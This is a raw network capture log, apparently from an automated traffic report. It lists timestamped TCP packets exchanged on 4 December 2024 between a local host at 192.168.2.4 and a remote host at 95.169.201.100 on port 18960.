                                                                                                                                                      Dec 4, 2024 13:58:11.961419106 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.961457968 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.962163925 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.962225914 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.962336063 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.963088989 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.963180065 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.963200092 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.963927984 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.963970900 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.964059114 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.964912891 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.964982986 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.964992046 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.965723991 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.965758085 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.965887070 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.966546059 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.966583967 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.966590881 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.967223883 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.967262983 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.967330933 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.968050957 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.968090057 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.968198061 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.968899012 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.968941927 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.969177008 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.969664097 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.969713926 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.969796896 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.970365047 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:11.970411062 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:11.970488071 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.035008907 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.035037041 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.035275936 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.035300016 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.035331011 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.035334110 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.035716057 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.035813093 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.035849094 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.036485910 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.036650896 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.036685944 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.037317991 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.037425995 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.037461042 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.037983894 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.038110018 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.038145065 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.038777113 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.038892031 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.038930893 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.039577007 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.039693117 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.039730072 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.040666103 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.040837049 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.040874958 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.041507006 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.041620016 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.041656971 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.042179108 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.042273045 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.042325020 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.042853117 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.042979002 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.043015003 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.043606043 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.043647051 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.043720961 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.044342995 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.044452906 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.044500113 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.045314074 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.045368910 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.045496941 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.046107054 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.046169996 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.046211958 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.046930075 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.046971083 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.047050953 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.047760010 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.047795057 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.047816992 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.048568010 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.048625946 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.048707962 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.049365997 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.049422979 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.049468994 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.050126076 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.050169945 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.050246954 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.051059008 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.051110983 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.051120043 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.051739931 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.051795006 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.051887035 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.052407026 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.052453995 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.052475929 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.053169966 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.053301096 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.053325891 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.053325891 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.054020882 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.054068089 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.054176092 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.055022955 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.055078983 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.055103064 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.055768013 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.055810928 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.055860996 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.056612968 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.056662083 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.056729078 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.057480097 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.057524920 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.057549953 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.120440960 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.145658970 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.145684004 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.145749092 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.146060944 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.146173000 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.146214008 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.146745920 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.146864891 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.146905899 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.147478104 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.147619963 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.147984028 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.148412943 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.148627996 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.148680925 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.149635077 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.149786949 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.149833918 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.150537968 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.150693893 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.150882006 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.151521921 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.151705027 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.151746988 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.152326107 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.152570009 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.152616024 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.153201103 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.153363943 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.153409004 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.154109955 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.154443979 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.154567003 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.155004978 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.155178070 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.155494928 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.155956984 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.156043053 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.156083107 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.156685114 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.156835079 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.156883955 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.157476902 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.157567978 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.157983065 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.158433914 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.158569098 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.158617973 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.159270048 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.159344912 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.159384966 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.160027981 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.160152912 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.160200119 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.160906076 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.161077976 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.161153078 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.161650896 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.161798954 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.161849022 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.162585020 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.162702084 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.162764072 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.163157940 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.163357973 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.163507938 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.163934946 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.164017916 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.164061069 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.164674044 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.226787090 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.226809025 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.226845026 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.226927042 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.226969004 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.227072954 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.227720022 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.227761030 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.227813005 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.228349924 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.228373051 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.228395939 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.229155064 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.229206085 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.229283094 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.229895115 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.229931116 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.229990959 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.230747938 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.230801105 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.230835915 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.231483936 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.231520891 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.231715918 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.232309103 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.232342005 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.232364893 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.233122110 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.233160973 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.233226061 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.233921051 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.233964920 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.234009027 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.234692097 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.234734058 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.234812975 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.235521078 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.235625982 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.235665083 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.236278057 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.236325026 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.236464024 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.237091064 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.237128019 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.237194061 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.237922907 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.237965107 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.238020897 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.238728046 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.238759041 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.238831997 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.239667892 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.239712000 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.239794016 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.240714073 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.240755081 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.240849972 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.241466999 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.241503954 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.241520882 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.242111921 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.242156982 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.242182970 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.242723942 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.242762089 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.242836952 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.243525982 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.243577003 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.243612051 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.244328976 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.244383097 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.244445086 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.245125055 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.245184898 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.245260954 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.245970011 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.246032000 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.246254921 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.246685028 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.246730089 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.246804953 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.247653961 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.247708082 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.247725010 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.248388052 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.248440981 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.248471975 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.249155998 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.249185085 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.249207973 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.249861956 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.249907970 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.337563038 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.337595940 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.337686062 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.337723970 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.337852955 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.337999105 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.338557005 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.338716030 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.338757992 CET4973218960192.168.2.495.169.201.100
                                                                                                                                                      Dec 4, 2024 13:58:12.339333057 CET189604973295.169.201.100192.168.2.4
                                                                                                                                                      Dec 4, 2024 13:58:12.339430094 CET189604973295.169.201.100192.168.2.4
